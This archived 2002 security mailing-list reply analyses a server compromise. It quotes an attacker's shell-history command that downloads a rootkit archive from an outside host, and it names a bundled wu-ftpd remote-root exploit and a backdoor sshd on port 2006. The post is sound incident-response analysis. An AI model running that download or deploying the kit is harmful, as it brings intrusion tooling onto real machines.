On Wed, Sep 11, 2002 at 08:15:42PM -0700, Ver Allan Sumabat wrote:
> 21 - wu-ftpd-2.6.1-20
> 22 - openssh-3.1
> 443 - tomcat-3.2.4
>
> 1. this is the content of /home/war's .bash_history:
>
> wget http://mrunix.free.fr/roy/w00tkit.tgz

There we go.

getting the kit and grepping through the binaries reveals:

7350wurm:^^^^7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
wus:^2.6.0^aw+^wus.log^^^wu-scan by yonezet (yonezethotmail.co.il)

Since the Attackers probably used the same rootkit to crack your machine
wuftpd was the Target. (No ssh exploit in the w00tkit Pkg, afaics; but
it seems to open another ssh at port 2006, it seems.)

Also, the tgz contains even a core file:
core: ELF 32-bit LSB core file Intel 80386, version 1 (SYSV), SVR4-style, from 'pstree'
The core file points out that the Machine (which threw the Core, not
yours) had several Processes running, including various Bouncers (IRC
Proxys), atleast on eggdrop (IRC Bot) and various scan Programs.

Another Fact is, that the other sshd (2006) has a static
sshd_random_seed File. I wonder if one can use that to fingerprint
hacked machines.

I did do a fast grep over the Files only, though, so one might find more
interesting Things.

        -rico

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]